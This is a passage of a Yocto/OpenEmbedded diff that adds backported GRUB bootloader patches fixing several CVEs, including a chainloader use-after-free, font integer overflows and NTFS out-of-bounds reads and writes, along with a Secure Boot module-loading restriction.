13a use-after-free bug that occurs when grub_cmd_chainloader() is executed
14more than once before a boot attempt is performed.
15
16Fixes: CVE-2022-28736
17
18Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
19Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
20---
21 grub-core/commands/boot.c | 66 ++++++++++++++++++++++++++----
22 grub-core/loader/efi/chainloader.c | 46 +++++++++++----------
23 include/grub/loader.h | 5 +++
24 3 files changed, 87 insertions(+), 30 deletions(-)
25
26diff --git a/grub-core/commands/boot.c b/grub-core/commands/boot.c
27index bbca81e..6151478 100644
28--- a/grub-core/commands/boot.c
29+++ b/grub-core/commands/boot.c
30@@ -27,10 +27,20 @@
31
32 GRUB_MOD_LICENSE ("GPLv3+");
33
34-static grub_err_t (*grub_loader_boot_func) (void);
35-static grub_err_t (*grub_loader_unload_func) (void);
36+static grub_err_t (*grub_loader_boot_func) (void *context);
37+static grub_err_t (*grub_loader_unload_func) (void *context);
38+static void *grub_loader_context;
39 static int grub_loader_flags;
40
41+struct grub_simple_loader_hooks
42+{
43+ grub_err_t (*boot) (void);
44+ grub_err_t (*unload) (void);
45+};
46+
47+/* Don't heap allocate this to avoid making grub_loader_set() fallible. */
48+static struct grub_simple_loader_hooks simple_loader_hooks;
49+
50 struct grub_preboot
51 {
52 grub_err_t (*preboot_func) (int);
53@@ -44,6 +54,29 @@ static int grub_loader_loaded;
54 static struct grub_preboot *preboots_head = 0,
55 *preboots_tail = 0;
56
57+static grub_err_t
58+grub_simple_boot_hook (void *context)
59+{
60+ struct grub_simple_loader_hooks *hooks;
61+
62+ hooks = (struct grub_simple_loader_hooks *) context;
63+ return hooks->boot ();
64+}
65+
66+static grub_err_t
67+grub_simple_unload_hook (void *context)
68+{
69+ struct grub_simple_loader_hooks *hooks;
70+ grub_err_t ret;
71+
72+ hooks = (struct grub_simple_loader_hooks *) context;
73+
74+ ret = hooks->unload ();
75+ grub_memset (hooks, 0, sizeof (*hooks));
76+
77+ return ret;
78+}
79+
80 int
81 grub_loader_is_loaded (void)
82 {
83@@ -110,28 +143,45 @@ grub_loader_unregister_preboot_hook (struct grub_preboot *hnd)
84 }
85
86 void
87-grub_loader_set (grub_err_t (*boot) (void),
88- grub_err_t (*unload) (void),
89- int flags)
90+grub_loader_set_ex (grub_err_t (*boot) (void *context),
91+ grub_err_t (*unload) (void *context),
92+ void *context,
93+ int flags)
94 {
95 if (grub_loader_loaded && grub_loader_unload_func)
96- grub_loader_unload_func ();
97+ grub_loader_unload_func (grub_loader_context);
98
99 grub_loader_boot_func = boot;
100 grub_loader_unload_func = unload;
101+ grub_loader_context = context;
102 grub_loader_flags = flags;
103
104 grub_loader_loaded = 1;
105 }
106
107+void
108+grub_loader_set (grub_err_t (*boot) (void),
109+ grub_err_t (*unload) (void),
110+ int flags)
111+{
112+ grub_loader_set_ex (grub_simple_boot_hook,
113+ grub_simple_unload_hook,
114+ &simple_loader_hooks,
115+ flags);
116+
117+ simple_loader_hooks.boot = boot;
118+ simple_loader_hooks.unload = unload;
119+}
120+
121 void
122 grub_loader_unset(void)
123 {
124 if (grub_loader_loaded && grub_loader_unload_func)
125- grub_loader_unload_func ();
126+ grub_loader_unload_func (grub_loader_context);
127
128 grub_loader_boot_func = 0;
129 grub_loader_unload_func = 0;
130+ grub_loader_context = 0;
131
132 grub_loader_loaded = 0;
133 }
134@@ -158,7 +208,7 @@ grub_loader_boot (void)
135 return err;
136 }
137 }
138- err = (grub_loader_boot_func) ();
139+ err = (grub_loader_boot_func) (grub_loader_context);
140
141 for (cur = preboots_tail; cur; cur = cur->prev)
142 if (! err)
143diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
144index a8d7b91..93a028a 100644
145--- a/grub-core/loader/efi/chainloader.c
146+++ b/grub-core/loader/efi/chainloader.c
147@@ -44,33 +44,28 @@ GRUB_MOD_LICENSE ("GPLv3+");
148
149 static grub_dl_t my_mod;
150
151-static grub_efi_physical_address_t address;
152-static grub_efi_uintn_t pages;
153-static grub_efi_device_path_t *file_path;
154-static grub_efi_handle_t image_handle;
155-static grub_efi_char16_t *cmdline;
156-
157 static grub_err_t
158-grub_chainloader_unload (void)
159+grub_chainloader_unload (void *context)
160 {
161+ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
162+ grub_efi_loaded_image_t *loaded_image;
163 grub_efi_boot_services_t *b;
164
165+ loaded_image = grub_efi_get_loaded_image (image_handle);
166+ if (loaded_image != NULL)
167+ grub_free (loaded_image->load_options);
168+
169 b = grub_efi_system_table->boot_services;
170 efi_call_1 (b->unload_image, image_handle);
171- efi_call_2 (b->free_pages, address, pages);
172-
173- grub_free (file_path);
174- grub_free (cmdline);
175- cmdline = 0;
176- file_path = 0;
177
178 grub_dl_unref (my_mod);
179 return GRUB_ERR_NONE;
180 }
181
182 static grub_err_t
183-grub_chainloader_boot (void)
184+grub_chainloader_boot (void *context)
185 {
186+ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
187 grub_efi_boot_services_t *b;
188 grub_efi_status_t status;
189 grub_efi_uintn_t exit_data_size;
190@@ -139,7 +134,7 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
191 char *dir_start;
192 char *dir_end;
193 grub_size_t size;
194- grub_efi_device_path_t *d;
195+ grub_efi_device_path_t *d, *file_path;
196
197 dir_start = grub_strchr (filename, ')');
198 if (! dir_start)
199@@ -215,11 +210,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
200 grub_efi_status_t status;
201 grub_efi_boot_services_t *b;
202 grub_device_t dev = 0;
203- grub_efi_device_path_t *dp = 0;
204+ grub_efi_device_path_t *dp = NULL, *file_path = NULL;
205 grub_efi_loaded_image_t *loaded_image;
206 char *filename;
207 void *boot_image = 0;
208 grub_efi_handle_t dev_handle = 0;
209+ grub_efi_physical_address_t address = 0;
210+ grub_efi_uintn_t pages = 0;
211+ grub_efi_char16_t *cmdline = NULL;
212+ grub_efi_handle_t image_handle = NULL;
213
214 if (argc == 0)
215 return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("filename expected"));
216@@ -227,11 +226,6 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
217
218 grub_dl_ref (my_mod);
219
220- /* Initialize some global variables. */
221- address = 0;
222- image_handle = 0;
223- file_path = 0;
224-
225 b = grub_efi_system_table->boot_services;
226
227 file = grub_file_open (filename, GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE);
228@@ -401,7 +395,11 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
229 grub_file_close (file);
230 grub_device_close (dev);
231
232- grub_loader_set (grub_chainloader_boot, grub_chainloader_unload, 0);
233+ /* We're finished with the source image buffer and file path now. */
234+ efi_call_2 (b->free_pages, address, pages);
235+ grub_free (file_path);
236+
237+ grub_loader_set_ex (grub_chainloader_boot, grub_chainloader_unload, image_handle, 0);
238 return 0;
239
240 fail:
241@@ -412,11 +410,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
242 if (file)
243 grub_file_close (file);
244
245+ grub_free (cmdline);
246 grub_free (file_path);
247
248 if (address)
249 efi_call_2 (b->free_pages, address, pages);
250
251+ if (image_handle != NULL)
252+ efi_call_1 (b->unload_image, image_handle);
253+
254 grub_dl_unref (my_mod);
255
256 return grub_errno;
257diff --git a/include/grub/loader.h b/include/grub/loader.h
258index 7f82a49..3071a50 100644
259--- a/include/grub/loader.h
260+++ b/include/grub/loader.h
261@@ -39,6 +39,11 @@ void EXPORT_FUNC (grub_loader_set) (grub_err_t (*boot) (void),
262 grub_err_t (*unload) (void),
263 int flags);
264
265+void EXPORT_FUNC (grub_loader_set_ex) (grub_err_t (*boot) (void *context),
266+ grub_err_t (*unload) (void *context),
267+ void *context,
268+ int flags);
269+
270 /* Unset current loader, if any. */
271 void EXPORT_FUNC (grub_loader_unset) (void);
272
273--
2742.25.1
275
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-3775.patch b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
new file mode 100644
index 0000000000..e2e3f35584
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
@@ -0,0 +1,97 @@
1From fdbe7209152ad6f09a1166f64f162017f2145ba3 Mon Sep 17 00:00:00 2001
2From: Zhang Boyang <zhangboyang.id@gmail.com>
3Date: Mon, 24 Oct 2022 08:05:35 +0800
4Subject: [PATCH] font: Fix an integer underflow in blit_comb()
5
6The expression (ctx.bounds.height - combining_glyphs[i]->height) / 2 may
7evaluate to a very big invalid value even if both ctx.bounds.height and
8combining_glyphs[i]->height are small integers. For example, if
9ctx.bounds.height is 10 and combining_glyphs[i]->height is 12, this
10expression evaluates to 2147483647 (expected -1). This is because
11coordinates are allowed to be negative but ctx.bounds.height is an
12unsigned int. So, the subtraction operates on unsigned ints and
13underflows to a very big value. The division makes things even worse.
14The quotient is still an invalid value even if converted back to int.
15
16This patch fixes the problem by casting ctx.bounds.height to int. As
17a result the subtraction will operate on int and grub_uint16_t which
18will be promoted to an int. So, the underflow will no longer happen. Other
19uses of ctx.bounds.height (and ctx.bounds.width) are also casted to int,
20to ensure coordinates are always calculated on signed integers.
21
22Fixes: CVE-2022-3775
23
24Reported-by: Daniel Axtens <dja@axtens.net>
25Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
26Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
27
28Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
29
30Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=992c06191babc1e109caf40d6a07ec6fdef427af]
31CVE: CVE-2022-3775
32Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
33---
34 grub-core/font/font.c | 16 ++++++++--------
35 1 file changed, 8 insertions(+), 8 deletions(-)
36
37diff --git a/grub-core/font/font.c b/grub-core/font/font.c
38index f110db9..3b76b22 100644
39--- a/grub-core/font/font.c
40+++ b/grub-core/font/font.c
41@@ -1200,12 +1200,12 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
42 ctx.bounds.height = main_glyph->height;
43
44 above_rightx = main_glyph->offset_x + main_glyph->width;
45- above_righty = ctx.bounds.y + ctx.bounds.height;
46+ above_righty = ctx.bounds.y + (int) ctx.bounds.height;
47
48 above_leftx = main_glyph->offset_x;
49- above_lefty = ctx.bounds.y + ctx.bounds.height;
50+ above_lefty = ctx.bounds.y + (int) ctx.bounds.height;
51
52- below_rightx = ctx.bounds.x + ctx.bounds.width;
53+ below_rightx = ctx.bounds.x + (int) ctx.bounds.width;
54 below_righty = ctx.bounds.y;
55
56 comb = grub_unicode_get_comb (glyph_id);
57@@ -1218,7 +1218,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
58
59 if (!combining_glyphs[i])
60 continue;
61- targetx = (ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
62+ targetx = ((int) ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
63 /* CGJ is to avoid diacritics reordering. */
64 if (comb[i].code
65 == GRUB_UNICODE_COMBINING_GRAPHEME_JOINER)
66@@ -1228,8 +1228,8 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
67 case GRUB_UNICODE_COMB_OVERLAY:
68 do_blit (combining_glyphs[i],
69 targetx,
70- (ctx.bounds.height - combining_glyphs[i]->height) / 2
71- - (ctx.bounds.height + ctx.bounds.y), &ctx);
72+ ((int) ctx.bounds.height - combining_glyphs[i]->height) / 2
73+ - ((int) ctx.bounds.height + ctx.bounds.y), &ctx);
74 if (min_devwidth < combining_glyphs[i]->width)
75 min_devwidth = combining_glyphs[i]->width;
76 break;
77@@ -1302,7 +1302,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
78 /* Fallthrough. */
79 case GRUB_UNICODE_STACK_ATTACHED_ABOVE:
80 do_blit (combining_glyphs[i], targetx,
81- -(ctx.bounds.height + ctx.bounds.y + space
82+ -((int) ctx.bounds.height + ctx.bounds.y + space
83 + combining_glyphs[i]->height), &ctx);
84 if (min_devwidth < combining_glyphs[i]->width)
85 min_devwidth = combining_glyphs[i]->width;
86@@ -1310,7 +1310,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
87
88 case GRUB_UNICODE_COMB_HEBREW_DAGESH:
89 do_blit (combining_glyphs[i], targetx,
90- -(ctx.bounds.height / 2 + ctx.bounds.y
91+ -((int) ctx.bounds.height / 2 + ctx.bounds.y
92 + combining_glyphs[i]->height / 2), &ctx);
93 if (min_devwidth < combining_glyphs[i]->width)
94 min_devwidth = combining_glyphs[i]->width;
95--
962.25.1
97
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
new file mode 100644
index 0000000000..0e74870ebf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
1From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
2From: Maxim Suhanov <dfirblog@gmail.com>
3Date: Mon, 28 Aug 2023 16:31:57 +0300
4Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
5 attribute for the $MFT file
6
7When parsing an extremely fragmented $MFT file, i.e., the file described
8using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
9containing bytes read from the underlying drive to store sector numbers,
10which are consumed later to read data from these sectors into another buffer.
11
12These sectors numbers, two 32-bit integers, are always stored at predefined
13offsets, 0x10 and 0x14, relative to first byte of the selected entry within
14the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
15
16However, when parsing a specially-crafted file system image, this may cause
17the NTFS code to write these integers beyond the buffer boundary, likely
18causing the GRUB memory allocator to misbehave or fail. These integers contain
19values which are controlled by on-disk structures of the NTFS file system.
20
21Such modification and resulting misbehavior may touch a memory range not
22assigned to the GRUB and owned by firmware or another EFI application/driver.
23
24This fix introduces checks to ensure that these sector numbers are never
25written beyond the boundary.
26
27Fixes: CVE-2023-4692
28
29Reported-by: Maxim Suhanov <dfirblog@gmail.com>
30Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
31Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
32
33Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
34CVE: CVE-2023-4692
35Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
36---
37 grub-core/fs/ntfs.c | 18 +++++++++++++++++-
38 1 file changed, 17 insertions(+), 1 deletion(-)
39
40diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
41index 2f34f76..c8d3683 100644
42--- a/grub-core/fs/ntfs.c
43+++ b/grub-core/fs/ntfs.c
44@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
45 }
46 if (at->attr_end)
47 {
48- grub_uint8_t *pa;
49+ grub_uint8_t *pa, *pa_end;
50
51 at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
52 if (at->emft_buf == NULL)
53@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
54 }
55 at->attr_nxt = at->edat_buf;
56 at->attr_end = at->edat_buf + u32at (pa, 0x30);
57+ pa_end = at->edat_buf + n;
58 }
59 else
60 {
61 at->attr_nxt = at->attr_end + u16at (pa, 0x14);
62 at->attr_end = at->attr_end + u32at (pa, 4);
63+ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
64 }
65 at->flags |= GRUB_NTFS_AF_ALST;
66 while (at->attr_nxt < at->attr_end)
67@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
68 at->flags |= GRUB_NTFS_AF_GPOS;
69 at->attr_cur = at->attr_nxt;
70 pa = at->attr_cur;
71+
72+ if ((pa >= pa_end) || (pa_end - pa < 0x18))
73+ {
74+ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
75+ return NULL;
76+ }
77+
78 grub_set_unaligned32 ((char *) pa + 0x10,
79 grub_cpu_to_le32 (at->mft->data->mft_start));
80 grub_set_unaligned32 ((char *) pa + 0x14,
81@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
82 {
83 if (*pa != attr)
84 break;
85+
86+ if ((pa >= pa_end) || (pa_end - pa < 0x18))
87+ {
88+ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
89+ return NULL;
90+ }
91+
92 if (read_attr
93 (at, pa + 0x10,
94 u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
95--
962.25.1
97
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
new file mode 100644
index 0000000000..1e6b6efdec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
1From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
2From: Maxim Suhanov <dfirblog@gmail.com>
3Date: Mon, 28 Aug 2023 16:32:33 +0300
4Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
5 $DATA attribute
6
7When reading a file containing resident data, i.e., the file data is stored in
8the $DATA attribute within the NTFS file record, not in external clusters,
9there are no checks that this resident data actually fits the corresponding
10file record segment.
11
12When parsing a specially-crafted file system image, the current NTFS code will
13read the file data from an arbitrary, attacker-chosen memory offset and of
14arbitrary, attacker-chosen length.
15
16This allows an attacker to display arbitrary chunks of memory, which could
17contain sensitive information like password hashes or even plain-text,
18obfuscated passwords from BS EFI variables.
19
20This fix implements a check to ensure that resident data is read from the
21corresponding file record segment only.
22
23Fixes: CVE-2023-4693
24
25Reported-by: Maxim Suhanov <dfirblog@gmail.com>
26Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
27Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
28
29Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
30CVE: CVE-2023-4693
31Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
32---
33 grub-core/fs/ntfs.c | 13 ++++++++++++-
34 1 file changed, 12 insertions(+), 1 deletion(-)
35
36diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
37index c8d3683..4d1fe42 100644
38--- a/grub-core/fs/ntfs.c
39+++ b/grub-core/fs/ntfs.c
40@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
41 {
42 if (ofs + len > u32at (pa, 0x10))
43 return grub_error (GRUB_ERR_BAD_FS, "read out of range");
44- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
45+
46+ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
47+ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
48+
49+ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
50+ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
51+
52+ if (u16at (pa, 0x14) + u32at (pa, 0x10) >
53+ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
54+ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
55+
56+ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
57 return 0;
58 }
59
60--
612.25.1
62
diff --git a/meta/recipes-bsp/grub/files/determinism.patch b/meta/recipes-bsp/grub/files/determinism.patch
index 3c1f562c71..bd4e7188ec 100644
--- a/meta/recipes-bsp/grub/files/determinism.patch
+++ b/meta/recipes-bsp/grub/files/determinism.patch
@@ -11,7 +11,7 @@ missing sorting of the list used to generate it. Add such a sort.
11Also ensure the generated unidata.c file is deterministic by sorting the 11Also ensure the generated unidata.c file is deterministic by sorting the
12keys of the dict. 12keys of the dict.
13 13
14Upstream-Status: Pending 14Upstream-Status: Submitted [https://lists.gnu.org/archive/html/grub-devel/2023-06/index.html]
15Richard Purdie <richard.purdie@linuxfoundation.org> 15Richard Purdie <richard.purdie@linuxfoundation.org>
16 16
17Index: grub-2.04/grub-core/genmoddep.awk 17Index: grub-2.04/grub-core/genmoddep.awk
diff --git a/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
new file mode 100644
index 0000000000..d4ba3cafc5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
@@ -0,0 +1,117 @@
1From 1f511ae054fe42dce7aedfbfe0f234fa1e0a7a3e Mon Sep 17 00:00:00 2001
2From: Zhang Boyang <zhangboyang.id@gmail.com>
3Date: Fri, 5 Aug 2022 00:51:20 +0800
4Subject: [PATCH] font: Fix size overflow in grub_font_get_glyph_internal()
5
6The length of memory allocation and file read may overflow. This patch
7fixes the problem by using safemath macros.
8
9There is a lot of code repetition like "(x * y + 7) / 8". It is unsafe
10if overflow happens. This patch introduces grub_video_bitmap_calc_1bpp_bufsz().
11It is safe replacement for such code. It has safemath-like prototype.
12
13This patch also introduces grub_cast(value, pointer), it casts value to
14typeof(*pointer) then store the value to *pointer. It returns true when
15overflow occurs or false if there is no overflow. The semantics of arguments
16and return value are designed to be consistent with other safemath macros.
17
18Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
19Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
20
21Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c76ec09ae08155df27cd237eaea150b4f02f532]
22
23Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
24Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
25---
26 grub-core/font/font.c | 17 +++++++++++++----
27 include/grub/bitmap.h | 18 ++++++++++++++++++
28 include/grub/safemath.h | 2 ++
29 3 files changed, 33 insertions(+), 4 deletions(-)
30
31diff --git a/grub-core/font/font.c b/grub-core/font/font.c
32index 5edb477..df17dba 100644
33--- a/grub-core/font/font.c
34+++ b/grub-core/font/font.c
35@@ -733,7 +733,8 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
36 grub_int16_t xoff;
37 grub_int16_t yoff;
38 grub_int16_t dwidth;
39- int len;
40+ grub_ssize_t len;
41+ grub_size_t sz;
42
43 if (index_entry->glyph)
44 /* Return cached glyph. */
45@@ -760,9 +761,17 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
46 return 0;
47 }
48
49- len = (width * height + 7) / 8;
50- glyph = grub_malloc (sizeof (struct grub_font_glyph) + len);
51- if (!glyph)
52+ /* Calculate real struct size of current glyph. */
53+ if (grub_video_bitmap_calc_1bpp_bufsz (width, height, &len) ||
54+ grub_add (sizeof (struct grub_font_glyph), len, &sz))
55+ {
56+ remove_font (font);
57+ return 0;
58+ }
59+
60+ /* Allocate and initialize the glyph struct. */
61+ glyph = grub_malloc (sz);
62+ if (glyph == NULL)
63 {
64 remove_font (font);
65 return 0;
66diff --git a/include/grub/bitmap.h b/include/grub/bitmap.h
67index 5728f8c..0d9603f 100644
68--- a/include/grub/bitmap.h
69+++ b/include/grub/bitmap.h
70@@ -23,6 +23,7 @@
71 #include <grub/symbol.h>
72 #include <grub/types.h>
73 #include <grub/video.h>
74+#include <grub/safemath.h>
75
76 struct grub_video_bitmap
77 {
78@@ -79,6 +80,23 @@ grub_video_bitmap_get_height (struct grub_video_bitmap *bitmap)
79 return bitmap->mode_info.height;
80 }
81
82+/*
83+ * Calculate and store the size of data buffer of 1bit bitmap in result.
84+ * Equivalent to "*result = (width * height + 7) / 8" if no overflow occurs.
85+ * Return true when overflow occurs or false if there is no overflow.
86+ * This function is intentionally implemented as a macro instead of
87+ * an inline function. Although a bit awkward, it preserves data types for
88+ * safemath macros and reduces macro side effects as much as possible.
89+ *
90+ * XXX: Will report false overflow if width * height > UINT64_MAX.
91+ */
92+#define grub_video_bitmap_calc_1bpp_bufsz(width, height, result) \
93+({ \
94+ grub_uint64_t _bitmap_pixels; \
95+ grub_mul ((width), (height), &_bitmap_pixels) ? 1 : \
96+ grub_cast (_bitmap_pixels / GRUB_CHAR_BIT + !!(_bitmap_pixels % GRUB_CHAR_BIT), (result)); \
97+})
98+
99 void EXPORT_FUNC (grub_video_bitmap_get_mode_info) (struct grub_video_bitmap *bitmap,
100 struct grub_video_mode_info *mode_info);
101
102diff --git a/include/grub/safemath.h b/include/grub/safemath.h
103index c17b89b..bb0f826 100644
104--- a/include/grub/safemath.h
105+++ b/include/grub/safemath.h
106@@ -30,6 +30,8 @@
107 #define grub_sub(a, b, res) __builtin_sub_overflow(a, b, res)
108 #define grub_mul(a, b, res) __builtin_mul_overflow(a, b, res)
109
110+#define grub_cast(a, res) grub_add ((a), 0, (res))
111+
112 #else
113 #error gcc 5.1 or newer or clang 3.8 or newer is required
114 #endif
115--
1162.25.1
117
diff --git a/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
new file mode 100644
index 0000000000..504352b4e3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
@@ -0,0 +1,107 @@
1From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001
2From: Matthew Garrett <mjg@redhat.com>
3Date: Mon, 13 Jan 2014 12:13:09 +0000
4Subject: Don't permit loading modules on UEFI secure boot
5
6Author: Colin Watson <cjwatson@ubuntu.com>
7Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch
8Forwarded: no
9Last-Update: 2013-12-25
10
11Patch-Name: no-insmod-on-sb.patch
12
13Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch]
14
15Backport of a Debian (and Fedora) patch implementing a way to get secure boot status
16for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport.
17Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch
18
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 grub-core/kern/dl.c | 13 +++++++++++++
22 grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++
23 include/grub/efi/efi.h | 1 +
24 3 files changed, 42 insertions(+)
25
26diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
27index 48eb5e7b6..074dfc3c6 100644
28--- a/grub-core/kern/dl.c
29+++ b/grub-core/kern/dl.c
30@@ -38,6 +38,10 @@
31 #define GRUB_MODULES_MACHINE_READONLY
32 #endif
33
34+#ifdef GRUB_MACHINE_EFI
35+#include <grub/efi/efi.h>
36+#endif
37+
38
39
40 #pragma GCC diagnostic ignored "-Wcast-align"
41@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename)
42 void *core = 0;
43 grub_dl_t mod = 0;
44
45+#ifdef GRUB_MACHINE_EFI
46+ if (grub_efi_secure_boot ())
47+ {
48+ grub_error (GRUB_ERR_ACCESS_DENIED,
49+ "Secure Boot forbids loading module from %s", filename);
50+ return 0;
51+ }
52+#endif
53+
54 grub_boot_time ("Loading module %s", filename);
55
56 file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE);
57diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
58index 6e1ceb905..96204e39b 100644
59--- a/grub-core/kern/efi/efi.c
60+++ b/grub-core/kern/efi/efi.c
61@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid,
62 return NULL;
63 }
64
65+grub_efi_boolean_t
66+grub_efi_secure_boot (void)
67+{
68+ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
69+ grub_size_t datasize;
70+ char *secure_boot = NULL;
71+ char *setup_mode = NULL;
72+ grub_efi_boolean_t ret = 0;
73+
74+ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize);
75+
76+ if (datasize != 1 || !secure_boot)
77+ goto out;
78+
79+ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize);
80+
81+ if (datasize != 1 || !setup_mode)
82+ goto out;
83+
84+ if (*secure_boot && !*setup_mode)
85+ ret = 1;
86+
87+ out:
88+ grub_free (secure_boot);
89+ grub_free (setup_mode);
90+ return ret;
91+}
92+
93 #pragma GCC diagnostic ignored "-Wcast-align"
94
95 /* Search the mods section from the PE32/PE32+ image. This code uses
96diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h
97index e90e00dc4..a237952b3 100644
98--- a/include/grub/efi/efi.h
99+++ b/include/grub/efi/efi.h
100@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var,
101 const grub_efi_guid_t *guid,
102 void *data,
103 grub_size_t datasize);
104+grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void);
105 int
106 EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1,
107 const grub_efi_device_path_t *dp2);
diff --git a/meta/recipes-bsp/grub/grub2.inc b/meta/recipes-bsp/grub/grub2.inc
index 2c55852ef0..bea03f4fc1 100644
--- a/meta/recipes-bsp/grub/grub2.inc
